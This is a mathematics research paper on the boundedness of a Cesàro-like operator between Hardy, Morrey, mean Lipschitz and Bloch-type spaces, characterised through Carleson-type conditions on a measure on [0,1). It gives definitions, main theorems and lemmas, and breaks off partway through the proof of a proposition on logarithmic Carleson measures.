# The Cesaro-like operator on some analytic function spaces ###### Abstract Let \(\mu\) be a finite positive Borel measure on the interval \([0,1)\) and \(f(z)=\sum_{n=0}^{\infty}a_{n}z^{n}\in H(\mathbb{D})\). The Cesaro-like operator is defined by \[\mathcal{C}_{\mu}(f)(z)=\sum_{n=0}^{\infty}\left(\mu_{n}\sum_{k=0}^{n}a_{k} \right)z^{n},\ z\in\mathbb{D},\] where, for \(n\geq 0\), \(\mu_{n}\) denotes the \(n\)-th moment of the measure \(\mu\), that is, \(\mu_{n}=\int_{[0,1)}t^{n}d\mu(t)\). Let \(X\) and \(Y\) be subspaces of \(H(\mathbb{D})\), the purpose of this paper is to study the action of \(\mathcal{C}_{\mu}\) on distinct pairs \((X,Y)\). The spaces considered in this paper are Hardy space \(H^{p}(0<p\leq\infty)\), Morrey space \(L^{2,\lambda}(0<\lambda\leq 1)\), mean Lipschitz space, Bloch type space, etc. **Keywords:** Cesaro-like operator, Carleson measure, Hardy spaces; Morrey space. **MSC 2010:** 47B38, 30H10 ## 1 Introduction Let \(\mathbb{D}=\{z\in\mathbb{C}:|z|<1\}\) denote the open unit disk of the complex plane \(\mathbb{C}\) and \(H(\mathbb{D})\), denote the space of all analytic functions in \(\mathbb{D}\) and \(dA(z)=\frac{1}{\pi}dxdy\) the normalized area Lebesgue measure. For \(0<\alpha<\infty\), the Bloch-type space, denoted by \(\mathcal{B}^{\alpha}\), is defined as \[\mathcal{B}^{\alpha}=\{f\in H(\mathbb{D}):||f||_{\mathcal{B}^{\alpha}}=|f(0)| +\sup_{z\in\mathbb{D}}(1-|z|^{2})^{\alpha}|f^{\prime}(z)|<\infty\}.\] If \(\alpha=1\), then \(\mathcal{B}^{\alpha}\) is just the classic Bloch space \(\mathcal{B}\). Let \(0<p\leq\infty\), the classical Hardy space \(H^{p}\) consists of those functions \(f\in H(\mathbb{D})\) for which \[||f||_{p}=\sup_{0\leq r<1}M_{p}(r,f)<\infty,\] where \[M_{p}(r,f)=\left(\frac{1}{2\pi}\int_{0}^{2\pi}|f(re^{i\theta})|^{p}d\theta\right) ^{1/p},\ 0<p<\infty,\] \[M_{\infty}(r,f)=\sup_{|z|=r}|f(z)|.\] Let \(I\subset\partial\mathbb{D}\) be an arc, and \(|I|\) denote the length of \(I\). The Carleson square \(S(I)\) is defined as \[S(I)=\{re^{i\vartheta}:e^{i\vartheta}\in I,\ 1-\frac{|I|}{2\pi}\leq r<1\}.\] Let \(\mu\) be a positive Borel measure on \(\mathbb{D}\). For \(0\leq\beta<\infty\) and \(0<t<\infty\), we say that \(\mu\) is a \(\beta\)-logarithmic \(t\)-Carleson measure (resp.a vanishing \(\beta\)-logarithmic \(t\)-Carleson measure) if \[\sup_{|I|\subset\partial\mathbb{D}}\frac{\mu(S(I))(\log\frac{2\pi}{|I|})^{ \beta}}{|I|^{t}}<\infty,\ \ \mbox{resp.}\ \ \lim_{|I|\to 0}\frac{\mu(S(I))(\log\frac{2\pi}{|I|})^{ \beta}}{|I|^{t}}=0.\] See [31] for more about logarithmic type Carleson measure. 
A positive Borel measure \(\mu\) on \([0,1)\) can be seen as a Borel measure on \(\mathbb{D}\) by identifying it with the measure \(\overline{\mu}\) defined by

\[\overline{\mu}(E)=\mu(E\cap[0,1)),\ \ \mbox{for any Borel subset}\ \ E\ \ \mbox{of}\ \ \mathbb{D}.\]

In this way, a positive Borel measure \(\mu\) on \([0,1)\) is a \(\beta\)-logarithmic \(t\)-Carleson measure if and only if there exists a constant \(M>0\) such that

\[\mu([s,1))\log^{\beta}\frac{e}{1-s}\leq M(1-s)^{t},\ \ 0\leq s<1.\]

For \(0<\lambda\leq 1\), the Morrey space \(L^{2,\lambda}(\mathbb{D})\) is the set of all \(f\in H^{2}\) such that

\[\sup_{I\subset\partial\mathbb{D}}\left(\frac{1}{|I|^{\lambda}}\int_{I}|f(e^{i\theta})-f_{I}|^{2}d\theta\right)^{\frac{1}{2}}<\infty.\]

The space \(L^{2,\lambda}(\mathbb{D})\) is a Banach space under the norm

\[||f||_{L^{2,\lambda}}=|f(0)|+\sup_{I\subset\partial\mathbb{D}}\left(\frac{1}{|I|^{\lambda}}\int_{I}|f(e^{i\theta})-f_{I}|^{2}d\theta\right)^{\frac{1}{2}}.\]

It is well known that \(L^{2,1}=BMOA\). The Morrey spaces increase when the parameter \(\lambda\) decreases, so we have the following relations:

\[BMOA\subseteq L^{2,\lambda_{2}}\subseteq L^{2,\lambda_{1}}\subseteq H^{2},\ \ 0<\lambda_{1}\leq\lambda_{2}\leq 1.\]

For \(0<\lambda\leq 1\), any function \(f\in L^{2,\lambda}\) has the following equivalent norm:

\[||f||_{L^{2,\lambda}}\asymp|f(0)|+\sup_{w\in\mathbb{D}}\left((1-|w|^{2})^{1-\lambda}\int_{\mathbb{D}}|f^{\prime}(z)|^{2}(1-|\sigma_{w}(z)|^{2})dA(z)\right)^{\frac{1}{2}},\]

where \(\sigma_{w}\) stands for the Möbius transformation \(\sigma_{w}(z)=\frac{w-z}{1-z\overline{w}}\). See [25] for this characterization. It is well known that functions \(f\in BMOA\) have logarithmic growth,

\[|f(z)|\leq C\log\frac{2}{1-|z|}.\]

This does not remain true for \(f\in L^{2,\lambda}\) when \(0<\lambda<1\). Indeed, it follows from Lemma 2 of [14] that

\[H^{\frac{2}{1-\lambda}}\subseteq L^{2,\lambda}\subseteq H^{2},\ \ 0<\lambda<1.\]

It is known that for \(0<\lambda<1\), every \(f\in L^{2,\lambda}\) satisfies

\[|f(z)|\lesssim\frac{||f||_{L^{2,\lambda}}}{(1-|z|)^{\frac{1-\lambda}{2}}},\ \ z\in\mathbb{D}. \tag{1.1}\]

By (1.1) we have that \(L^{2,\lambda}\subseteq \mathcal{B}^{\frac{3-\lambda}{2}}\) for all \(0<\lambda\leq 1\). When \(\lambda=1\), it is obvious that the inclusion is strict. For \(0<\lambda<1\), the function \(h(z)=\sum_{k=0}^{\infty}z^{2^{k}}\in\mathcal{B}\subsetneq\mathcal{B}^{\frac{3-\lambda}{2}}\) shows that the inclusion is also strict: since \(h\) has a radial limit almost nowhere, \(h\notin H^{p}\) for any \(0<p<\infty\), which implies that \(h\notin L^{2,\lambda}\). The reader is referred to [10, 13, 38, 39] for more about Morrey spaces.

For \(1\leq p<\infty\) and \(0<\alpha\leq 1\), the mean Lipschitz space \(\Lambda^{p}_{\alpha}\) consists of those functions \(f\in H(\mathbb{D})\) having a non-tangential limit almost everywhere such that \(\omega_{p}(t,f)=O(t^{\alpha})\) as \(t\to 0\). Here \(\omega_{p}(\cdot,f)\) is the integral modulus of continuity of order \(p\) of the function \(f(e^{i\theta})\).
It is known (see [27]) that \(\Lambda^{p}_{\alpha}\) is a subset of \(H^{p}\) and \[\Lambda^{p}_{\alpha}=\left(f\in H(\mathbb{D}):M_{p}(r,f^{\prime})=O\left( \frac{1}{(1-r)^{1-\alpha}}\right),\ \ \text{as}\ r\to 1\right).\] The space \(\Lambda^{p}_{\alpha}\) is a Banach space with the norm \(||\cdot||_{\Lambda^{p}_{\alpha}}\) given by \[\|f\|_{\Lambda^{p}_{\alpha}}=|f(0)|+\sup_{0\leq r<1}(1-r)^{1-\alpha}M_{p}(r,f ^{\prime}).\] In [26], Shapiro and Sledd proved that \[\Lambda^{p}_{\frac{1}{p}}\subseteq BMOA.\ \ 1<p<\infty.\] When \(p=1\), the space \(\Lambda^{1}_{1}\) is equivalent to the space \[\left\{f\in H(\mathbb{D}):\sup_{0\leq r<1}(1-r)M_{1}(f^{\prime\prime},r)< \infty\right\}. \tag{1.2}\] See [24, 11] for more about Lipschitz space and related analytic function spaces. For \(f(z)=\sum_{n=0}^{\infty}\hat{f}(n)z^{n}\in H(\mathbb{D})\), the Cesaro operator \(\mathcal{C}\) is defined by \[\mathcal{C}(f)(z)=\sum_{n=0}^{\infty}\left(\frac{1}{n+1}\sum_{k=0}^{n}\widehat{ f}(k)\right)z^{n}=\int_{0}^{1}\frac{f(tz)}{1-tz}dt,\ z\in\mathbb{D}.\] The Cesaro operator \(\mathcal{C}\) is bounded on \(H^{p}\) for \(0<p<\infty\). The case of \(1<p<\infty\) follows from a result of Hardy on Fourier series [8] together with the Riesz transform. Siskakis [3] give an alternative proof of this result and to extend it to \(p=1\) by using semigroups of composition operators. A direct proof of the boundedness on \(H^{1}\) was given by Siskakis in [5]. Miao [15] proved the case \(0<p<1\). Stempak [19] gave a proof valid for \(0<p\leq 2\). Andersen [18] and Nowak [21] provided another proof valid for all \(0<p<\infty\). In the case \(p=\infty\), since \(\mathcal{C}(1)(z)=\log\frac{1}{1-z}\notin H^{\infty}\), so that \(\mathcal{C}(H^{\infty})\nsubseteq H^{\infty}\). Danikas and Siskakis [22] proved that \(\mathcal{C}(H^{\infty})\nsubseteq BMOA\) and \(\mathcal{C}(BMOA)\nsubseteq BMOA\). Cesaro operator \(\mathcal{C}\) act on weighted Bergman spaces, Dirichlet space and general mixed normed spaces \(H(p,q,\varphi)\) the reader is referred to [5, 33, 1, 28, 16]. Recently, Galanopoulos, Girela and Merchan [29] introduced a Cesaro-like operator \(\mathcal{C}_{\mu}\) on \(H(\mathbb{D})\), which is a natural generalization of the classical Cesaro operator \(\mathcal{C}\). They consider the following generalization: For a positive Borel measure \(\mu\) on the interval \([0,1)\) they define the operator \[\mathcal{C}_{\mu}(f)(z)=\sum_{n=0}^{\infty}\left(\mu_{n}\sum_{k=0}^{n}\widehat {f}(k)\right)z^{n}=\int_{0}^{1}\frac{f(tz)}{(1-tz)}d\mu(t),\ z\in\mathbb{D}. \tag{1.3}\] where \(\mu_{n}\) stands for the moment of order \(n\) of \(\mu\), that is, \(\mu_{n}=\int_{0}^{1}t^{n}d\mu(t)\). They studied the operators \(\mathcal{C}_{\mu}\) acting on distinct spaces of analytic functions(e.g. Hardy space, Bergman space, Bloch space, etc.). The Cesaro-like operator \(\mathcal{C}_{\mu}\) defined above has attracted the interest of many mathematicians. Jin and Tang [12] studied the boundedness(compactness) of \(\mathcal{C}_{\mu}\) from one Dirichlet-type space into another one. Bao, Sun and Wulan [7] studied the range of \(\mathcal{C}_{\mu}\) acting on \(H^{\infty}\). They proved that \(\mathcal{C}_{\mu}(H^{\infty})\subset\cap_{p>1}\Lambda_{\frac{1}{p}}^{p}\) if and only if \(\mu\) is a \(1\)-Carleson measure. This gives an answer to the question which was left open in [29]. In fact, they worked on a more general version. Just recently, Blasco [23] used a different method to also get the same result. 
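To fix ideas, two elementary examples are worth recording. If \(d\mu(t)=dt\) is the Lebesgue measure on \([0,1)\), then

\[\mu_{n}=\int_{0}^{1}t^{n}dt=\frac{1}{n+1},\qquad n\geq 0,\]

so (1.3) reduces to the classical Cesàro operator \(\mathcal{C}\). If instead \(d\mu(t)=\alpha(1-t)^{\alpha-1}dt\) for some \(\alpha>0\), then \(\mu([s,1))=(1-s)^{\alpha}\) for \(0\leq s<1\), so \(\mu\) is an \(\alpha\)-Carleson measure on \([0,1)\) in the sense recalled above.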
Based on the previous results, it is natural to discuss the range of \(H^{\infty}\) under the action of \(\mathcal{C}_{\mu}\) when \(\mu\) is an \(\alpha\)-Carleson measure with \(0<\alpha<1\). Furthermore, what is the condition for the measure \(\mu\) such that \(\mathcal{C}_{\mu}(H^{p})\subset\cap_{q>1}\Lambda_{\frac{1}{q}}^{q}\)? We shall prove the following general version of the results, which give the answers to these questions. As consequences of our study, we may reproduce many of the known conclusions as well as obtain some new results. **Theorem 1.1**.: _Suppose \(0<p\leq\infty\), \(0<\lambda\leq 1\) and \(\mu\) is a finite positive Borel measure on the interval \([0,1)\). Let \(X\) be subspace of \(H(\mathbb{D})\) with \(L^{2,\lambda}\subseteq X\subseteq\mathcal{B}^{\frac{3-\lambda}{2}}\). Then \(\mathcal{C}_{\mu}(H^{p})\subseteq X\) if and only if \(\mu\) is a \(\frac{1+\lambda}{2}+\frac{1}{p}\)-Carleson measure._ **Theorem 1.2**.: _Suppose \(0<p<\infty\), \(1<q<\infty\) and \(\mu\) is a finite positive Borel measure on the interval \([0,1)\). Let \(X\) and \(Y\) be subspaces of \(H(\mathbb{D})\) such that \(H^{p}\subseteq X\subseteq\mathcal{B}^{1+\frac{1}{p}}\) and \(\Lambda_{\frac{1}{q}}^{q}\subseteq Y\subseteq\mathcal{B}\). Then the following statements hold. (1) The operator \(\mathcal{C}_{\mu}\) is bounded from \(X\) into \(Y\) if and only if \(\mu\) is a \(1+\frac{1}{p}\)-Carleson measure. (2) If \(\mu\) is a \(1\)-logarithmic \(1+\frac{1}{p}\)-Carleson measure, then \(\mathcal{C}_{\mu}:X\rightarrow\Lambda_{1}^{1}\) is bounded._ If \(1\leq p<\infty\), we know that \(\mathcal{C}_{\mu}:BMOA\rightarrow\Lambda_{\frac{1}{p}}^{p}\) if and only if \(\mu\) is a \(1\)-logarithmic \(1\)-Carleson measure. Theorem 1.2 includes a characterization of those \(\mu\) so that \(\mathcal{C}_{\mu}\) maps \(L^{2,\lambda}\) into \(\Lambda_{\frac{1}{p}}^{p}\). In [29], the authors proved that if \(X\) and \(Y\) are spaces of holomorphic functions in the unit disc \(\mathbb{D}\), such that \(\Lambda_{\frac{1}{2}}^{2}\subseteq X,Y\subseteq\mathcal{B}\), then \(\mathcal{C}_{\mu}\) is a bounded operator from the space \(X\) into the space \(Y\) if and only if \(\mu\) is a \(1\)-logarithmic \(1\)-Carleson measure. Since \(\Lambda_{\frac{1}{2}}^{2}\subseteq BMOA=L^{2,1}\subseteq\mathcal{B}\), so that \(\mathcal{C}_{\mu}\) is a bounded operator from \(X\) into the space \(L^{2,1}\) if and only if \(\mu\) is a \(1\)-logarithmic \(1\)-Carleson measure. It is natural to ask what's the condition for \(\mu\) such that \(\mathcal{C}_{\mu}\) is bounded from \(X\) into \(L^{2,\lambda}\)? On the other hand, whether the space \(\Lambda_{\frac{1}{2}}^{2}\) can be extended to the space \(\Lambda_{1}^{1}\)? We are now ready to state our next results, which generalized the previous mentioned results. Our results also gives the range of \(X\) under the action of \(\mathcal{C}_{\mu}\) when \(\mu\) is a \(1\)-logarithmic \(s\)-Carleson measure with \(\frac{1}{2}<s<1\). **Theorem 1.3**.: _Suppose \(0<\lambda\leq 1\) and \(\mu\) is a finite positive Borel measure on the interval \([0,1)\). Let \(X\) and \(Y\) be subspaces of \(H(\mathbb{D})\) such that \(\Lambda_{1}^{1}\subseteq X\subseteq\mathcal{B}\) and \(L^{2,\lambda}\subset Y\subset\mathcal{B}^{\frac{3-\lambda}{2}}\). Then the following conditions are equivalent. (1) The operator \(\mathcal{C}_{\mu}\) is bounded from \(X\) into \(Y\). 
(2) The measure \(\mu\) is a \(1\)-logarithmic \(1\)-Carleson measure._ The boundedness of the operator \(\mathcal{C}_{\mu}\) acting on \(BMOA\) has been studied in [29, 7, 23]. The space of \(BMOA\) is close related to the Morrey space \(L^{2,\lambda}\). Since the Moreey space \(L^{2,\lambda}\) has showed up in a natural way in our work, it seems natural to study the action of the operators \(\mathcal{C}_{\mu}\) on the Moreey space \(L^{2,\lambda}\) for general values of the parameters \(\lambda\). The following result gives a complete characterization of the boundedness of \(\mathcal{C}_{\mu}\) act between different Morrey spaces. Note that the case of \(\lambda_{1}=1\) is contained in Theorem 1.3. **Theorem 1.5**.: _Suppose \(0<\lambda_{1}<1\), \(0<\lambda_{2}\leq 1\), \(\mu\) is a finite positive Borel measure on the interval \([0,1)\). Let \(X\) and \(Y\) be subspaces of \(H(\mathbb{D})\) such that \(L^{2,\lambda_{1}}\subseteq X\subseteq\mathcal{B}^{\frac{3-\lambda_{1}}{2}}\) and \(L^{2,\lambda_{2}}\subseteq Y\subseteq\mathcal{B}^{\frac{3-\lambda_{2}}{2}}\). Then the following statements are equivalent. (1) The operator \(\mathcal{C}_{\mu}\) is bounded from \(X\) into \(Y\). (2) The measure \(\mu\) is a \(1+\frac{\lambda_{2}-\lambda_{1}}{2}\)-Carleson measure._ In section 2, we shall give some basic results that will be used in the proof. Section 3 will be devoted to present the proofs of Theorem 1.1-Theorem 1.5 and gives some relevant corollaries. It is necessary to clarify that the subspaces \(X\) and \(Y\) of \(H(\mathbb{D})\) we shall be dealing with are Banach spaces continuously embedded in \(H(\mathbb{D})\), to prove that the operator \(\mathcal{C}_{\mu}\) is bounded from \(X\) into \(Y\) it suffices to show that it maps \(X\) into \(Y\) by using the closed graph theorem. Throughout the paper, the letter \(C\) will denote a positive constant which depends only upon the displayed parameters (which sometimes will be omitted) but not necessarily the same at different occurrences. Furthermore, we will use the notation \(Q_{1}\lesssim Q_{2}\) if there exists a constant \(C\) such that \(Q_{1}\leq CQ_{2}\), and \(Q_{1}\gtrsim Q_{2}\) is understood in an analogous manner. In particular, if \(Q_{1}\lesssim Q_{2}\) and \(Q_{1}\gtrsim Q_{2}\), then we write \(Q_{1}\asymp Q_{2}\) and say that \(Q_{1}\) and \(Q_{2}\) are equivalent. This notation has already been used above in the introduction. Preliminary Results **Lemma 2.1**.: _Let \(0<\alpha<\infty\) and \(f\in\mathcal{B}^{\alpha}\). Then for each \(z\in\mathbb{D}\), we have the following inequalities:_ \[|f(z)|\lesssim\begin{cases}||f||_{\mathcal{B}^{\alpha}},\text{ if }0<\alpha<1;\\ ||f||_{\mathcal{B}^{\alpha}}\log\frac{2}{1-|z|},\text{ if }\alpha=1;\\ \frac{||f||_{\mathcal{B}^{\alpha}}}{(1-|z|)^{\alpha-1}},\text{ if }\alpha>1.\end{cases}\] This well known Lemma can be found in [20]. **Lemma 2.2**.: _Let \(\alpha>0\) and \(f\in H(\mathbb{D})\), \(f(z)=\sum_{n=0}^{\infty}\widehat{f}(n)z^{n}\), \(\widehat{f}(n)\geq 0\) for all \(n\geq 0\). Then \(f\in\mathcal{B}^{\alpha}\) if and only if_ \[\sup_{n\geq 1}n^{-\alpha}\sum_{k=1}^{n}k\widehat{f}(k)<\infty.\] This result follows from Corollary 3.2 in [30] or Theorem 2.6 in [9]. **Lemma 2.3**.: _Let \(0<s<\infty\) and \(\mu\) be a finite positive Borel measure on the interval \([0,1)\). Then the following statements hold: (1) \(\mu\) is an \(s\)-Carleson measure if and only if \(\mu_{n}=O(\frac{1}{n^{s}})\). 
(2) \(\mu\) is a vanishing \(s\)-Carleson measure if and only if \(\mu_{n}=o(\frac{1}{n^{s}})\)._ This Lemma follows from Theorem 2.1 and Theorem 2.4 in [6]. The following integral estimates are useful. We only list the required ones. See [35] for the detailed proofs and other cases. **Lemma 2.4**.: _Suppose that \(r\geq 0,t\geq 0,\delta>-1,k\geq 0.\) Let_ \[J_{w,a}=\int_{\mathbb{D}}\frac{(1-|z|^{2})^{\delta}}{|1-z\overline{w}|^{t}|1- z\overline{a}|^{r}}\log^{k}\frac{e}{1-|z|^{2}}dA(z),\ \ w,a\in\mathbb{D}.\] _(1) If \(t+r-\delta>2\), \(t-\delta<2\) and \(r-\delta<2\), then_ \[J_{w,a}\asymp\frac{1}{|1-\langle w,a\rangle|^{t+r-\delta-2}}\log^{k}\frac{e}{ |1-\langle w,a\rangle|}.\] _(2) If \(t-\delta>2>r-\delta\), then_ \[J_{w,a}\asymp\frac{1}{(1-|w|^{2})^{t-\delta-n-1}|1-\langle w,a\rangle|^{r}} \log^{k}\frac{e}{1-|w|^{2}}.\] We also need the following estimates. (See e.g. Theorem 1.12 in [20]) **Lemma 2.5**.: _Let \(\alpha\) be any real number and \(z\in\mathbb{D}\). Then_ \[\int_{0}^{2\pi}\frac{d\theta}{|1-ze^{-i\theta}|^{\alpha}}\asymp\begin{cases}1& \text{ if }\,\alpha<1,\\ \log\frac{2}{1-|z|^{2}}&\text{ if }\,\alpha=1,\\ \frac{1}{(1-|z|^{2})^{\alpha-1}}&\text{ if }\,\alpha>1,\end{cases}\] The following result is known to experts. We give a detailed proof by using the integral estimates with double variable points. These integral estimates are practical and have its own interests. The reader is referred to [35, 32, 36] for various integral estimates. **Lemma 2.6**.: _Let \(0<\lambda<1\), then for any \(c\leq\frac{1-\lambda}{2}\), we have_ \[f(z)=\frac{1}{(1-z)^{c}}\in L^{2,\lambda}.\] Proof.: It is suffices to prove the case of \(c=\frac{1-\lambda}{2}\). For \(0<r<1\) and \(w\in\mathbb{D}\), by Proposition 3.1-(7) in [36] we have \[\int_{0}^{2\pi}\frac{d\theta}{|1-re^{i\theta}|^{3-\lambda}|1-r\overline{w}e^{ i\theta}|^{2}}\asymp\frac{1}{(1-r)^{2-\lambda}|1-r^{2}\overline{w}|^{2}}+\frac{1}{(1- r^{2}|w|)|1-r^{2}\overline{w}|^{3-\lambda}}.\] It is easy to check that \[\frac{1}{|1-r^{2}\overline{w}|^{2}}\lesssim\frac{1}{(1-r|w|)^{2}}\ \text{ and }\frac{1-r}{(1-r^{2}|w|)|1-r^{2}\overline{w}|^{3-\lambda}}\lesssim\frac{(1- r)^{\lambda-1}}{(1-r|w|)^{2}}.\] Using the polar coordinate formula and above inequalities we get \[||f||_{L^{2,\lambda}} \asymp\sup_{w\in\mathbb{D}}\left((1-|w|^{2})^{1-\lambda}\int_{ \mathbb{D}}|f^{\prime}(z)|^{2}(1-|\sigma_{w}(z)|^{2})dA(z)\right)^{\frac{1}{2}}\] \[\lesssim\sup_{w\in\mathbb{D}}(1-|w|^{2})^{\frac{2-\lambda}{2}} \left(\int_{0}^{1}(1-r)\int_{0}^{2\pi}\frac{d\theta}{|1-re^{i\theta}|^{3- \lambda}|1-r\overline{w}e^{i\theta}|^{2}}dr\right)^{\frac{1}{2}}\] \[\asymp\sup_{w\in\mathbb{D}}(1-|w|^{2})^{\frac{2-\lambda}{2}} \left(\int_{0}^{1}\frac{(1-r)^{\lambda-1}}{|1-r^{2}\overline{w}|^{2}}dr+\int_{ 0}^{1}\frac{1-r}{(1-r^{2}|w|)|1-r^{2}\overline{w}|^{3-\lambda}}dr\right)^{ \frac{1}{2}}\] \[\lesssim\sup_{w\in\mathbb{D}}(1-|w|^{2})^{\frac{2-\lambda}{2}} \left(\int_{0}^{1}\frac{(1-r)^{\lambda-1}}{(1-r|w|)^{2}}dr\right)^{\frac{1}{2}}\] \[\lesssim 1.\] The last step above we have used the integral estimate \[\int_{0}^{1}\frac{(1-r)^{\lambda-1}}{(1-r|w|)^{2}}dr\asymp\frac{1}{(1-|w|)^{2- \lambda}},\] which can be found in the literature [37]. ## 3 Proofs of the main results First, we give some characterizations of positive Borel measures \(\mu\) on \([0,1)\) as logarithmic type Carleson measures, this will be used in our proofs. **Proposition 3.1**.: _Suppose \(\beta>0\), \(\gamma\geq 0\), \(0\leq q<s<\infty\) and \(\mu\) is a finite positive Borel measure on \([0,1)\). 
Then the following conditions are equivalent:_ 1. \(\mu\) _is a_ \(\gamma\)_-logarithmic_ \(s\)_-Carleson measure;_ 2. \[S_{1}:=\sup_{w\in\mathbb{D}}\int_{0}^{1}\frac{(1-|w|)^{\beta}\log^{\gamma} \frac{e}{1-|w|}}{(1-t)^{q}(1-|w|t)^{s+\beta-q}}d\mu(t)<\infty;\] 3. \[S_{2}:=\sup_{w\in\mathbb{D}}\int_{0}^{1}\frac{(1-|w|)^{\beta}\log^{\gamma} \frac{e}{1-|w|}}{(1-t)^{q}|1-wt|^{s+\beta-q}}d\mu(t)<\infty.\] 4. \[S_{3}:=\sup_{w\in\mathbb{D}}\int_{0}^{1}\frac{(1-|w|)^{\beta}\log^{\gamma} \frac{e}{1-t}}{(1-t)^{q}(1-|w|t)^{s+\beta-q}}d\mu(t)<\infty.\] Proof.: The proof of \((2)\Rightarrow(1)\) is straightforward. In fact, \[S_{1}:=\sup_{w\in\mathbb{D}}\int_{0}^{1}\frac{(1-|w|)^{\beta} \log^{\gamma}\frac{e}{1-|w|}}{(1-t)^{q}(1-|w|t)^{s+\beta-q}}d\mu(t)\] \[\geq\int_{|w|}^{1}\frac{(1-|w|)^{\beta}\log^{\gamma}\frac{e}{1-| w|}}{(1-t)^{q}(1-|w|t)^{s+\beta-q}}d\mu(t)\] \[\gtrsim\frac{\mu(|w|,1)\log^{\gamma}\frac{e}{1-|w|}}{(1-|w|)^{s}}.\] This finish the proof of \((2)\Rightarrow(1)\). Similarly, we may obtain \((3)\Rightarrow(1)\) and \((4)\Rightarrow(1)\). Since \((2)\Rightarrow(3)\) is obvious, to complete the proof we have to prove that \((1)\Rightarrow(2)\) and \((1)\Rightarrow(4)\). \((1)\Rightarrow(2)\). The proof of this implication follows closely the arguments of the proof of Proposition 2.1 in [7]. We include a detailed proof for completeness. It is suffices to consider the case \(w\in\mathbb{D}\) with \(\frac{1}{2}\leq|w|<1\) and \(q>0\). For every positive integer \(n\geq 1\), let \[Q_{0}(w)=\varnothing,Q_{n}(w)=\{t\in[0,1):1-2^{n}(1-|w|)\leq t<1\}.\] Let \(n_{w}\) be the minimal integer such that \(1-2^{n_{w}}(1-|w|)\leq 0\). Then \(Q_{n}(w)=[0,1)\) when \(n\geq n_{w}\). If \(t\in Q_{1}(w)\), then \[1-|w|\leq 1-|w|t.\] Also, for \(2\leq n\leq n_{w}\) and \(t\in Q_{n}(w)\backslash Q_{n-1}(w)\), we have \[(2^{n-1}-1)(1-|w|)=|w|-(1-2^{n-1}(1-|w|))\leq|w|-t\leq 1-|w|t.\] Notice that \(\beta>0\), \(\gamma\geq 0\), \(0<q<s<\infty\) and \(\mu\) is a \(\gamma\)-logarithmic \(s\)-Carleson measure, these together with above inequalities we have \[\int_{0}^{1}\frac{\log^{\gamma}\frac{e}{1-|w|}(1-|w|)^{\beta}}{(1-t )^{q}(1-|w|t)^{s+\beta-q}}d\mu(t)\] \[=\sum_{n=1}^{n_{w}}\int_{Q_{n}(w)\backslash Q_{n-1}(w)}\frac{\log ^{\gamma}\frac{e}{1-|w|}(1-|w|)^{\beta}}{(1-t)^{q}(1-|w|t)^{s+\beta-q}}d\mu(t)\] \[\lesssim\sum_{n=1}^{n_{w}}\frac{\log^{\gamma}\frac{e}{1-|w|}(1-|w |)^{q-s}}{2^{n(s+\beta-q)}}\int_{Q_{n}(w)\backslash Q_{n-1}(w)}\frac{1}{(1-t )^{q}}d\mu(t)\] \[\lesssim\sum_{n=1}^{n_{w}}\frac{\log^{\gamma}\frac{e}{1-|w|}(1-|w |)^{q-s}}{2^{n(s+\beta-q)}}\int_{0}^{\infty}x^{q-1}\mu\big{(}\big{\{}t\in[1-2^ {n}(1-|w|),1):1-\frac{1}{x}<t\big{\}}\big{\}}dx\] \[\asymp\sum_{n=1}^{n_{w}}\frac{\log^{\gamma}\frac{e}{1-|w|}(1-|w|) ^{q-s}}{2^{n(s+\beta-q)}}\int_{0}^{\frac{1}{2^{n}(1-|w|)}}x^{q-1}\mu\big{(}[1 -2^{n}(1-|w|),1))dx\] \[\quad+\sum_{n=1}^{n_{w}}\frac{\log^{\gamma}\frac{e}{1-|w|}(1-|w|) ^{q-s}}{2^{n(s+\beta-q)}}\int_{\frac{1}{2^{n}(1-|w|)}}^{\infty}x^{q-1}\mu \big{(}\big{[}1-\frac{1}{x},1\big{)}\big{)}dx\] \[\lesssim\sum_{n=1}^{n_{w}}\frac{\log^{\gamma}\frac{e}{1-|w|}(1-|w |)^{q-s}}{2^{n(s+\beta-q)}}\left(\frac{2^{ns}(1-|w|)^{s}}{\log^{\gamma}\frac{ e}{2^{n}(1-|w|)}}\int_{0}^{\frac{1}{2^{n}(1-|w|)}}x^{q-1}dx+\int_{\frac{1}{2^{n}(1-|w|) }}^{\infty}\frac{\log^{-\gamma}ex}{x^{s+1-q}}dx\right)\] \[\lesssim\sum_{n=1}^{n_{w}}\frac{1}{2^{\beta n}}\frac{\log^{\gamma }\frac{e}{1-|w|}}{\log^{\gamma}\frac{e}{2^{n}(1-|w|)}}\lesssim\sum_{n=1}^{n_{w} }\frac{1}{2^{\beta n}}\left(1+\frac{n^{\gamma}\log 
2}{\log^{\gamma}\frac{2}{2^{n}(1-|w|) }}\right)\lesssim\sum_{n=1}^{n_{w}}\frac{n^{\gamma}}{2^{\beta n}}\lesssim 1.\] This implies that \[S_{1}:=\sup_{w\in\mathbb{D}}\int_{0}^{1}\frac{(1-|w|)^{\beta}}{(1-t)^{q}(1-|w| t)^{s+\beta-q}}d\mu(t)<\infty.\] \((1)\Rightarrow(4)\). We only need consider the case of \(\gamma>0\). For \(0<\delta<s-q\), let \[f(t)=(1-t)^{\delta}\log^{\gamma}\frac{e}{1-t},\ \ 0\leq t<1.\] It is known that \(f\) is a normal function on \([0,1)\). Furthermore, we may choosing \(b=\delta\) and \(0<a=\varepsilon<\delta\) such that \[\frac{f(t)}{(1-t)^{b}}\mbox{is increasing},\ \frac{f(t)}{(1-t)^{a}}\mbox{is decreasing},\ \mbox{as}\ t\to 1^{-}.\] Hence, it follows form Lemma 2.2 in [34] that \[\frac{f(t)}{f(r)}\lesssim\left(\frac{1-t}{1-r}\right)^{\varepsilon}+\left( \frac{1-t}{1-r}\right)^{\delta} \tag{3.1}\] for all \(0<t,r<1\). Bearing in mind that \((1)\Leftrightarrow(2)\) we have proved already. By (3.1) we have \[\int_{0}^{1}\frac{(1-|w|)^{\beta}\log^{\gamma}\frac{e}{1-t}}{(1-t)^ {q}(1-|w|t)^{s+\beta-q}}d\mu(t)\] \[=\int_{0}^{1}\frac{(1-|w|)^{\beta+\delta}\log^{\gamma}\frac{e}{1- |w|}}{(1-t)^{q+\delta}(1-|w|t)^{s+\beta-q}}\cdot\frac{f(t)}{f(|w|)}d\mu(t)\] \[\lesssim\int_{0}^{1}\frac{(1-|w|)^{\beta+\delta}\log^{\gamma}\frac {e}{1-|w|}}{(1-t)^{q+\delta}(1-|w|t)^{s+\beta-q}}\left\{\left(\frac{1-t}{1-|w |}\right)^{\varepsilon}+\left(\frac{1-t}{1-|w|}\right)^{\delta}\right\}d\mu(t)\] 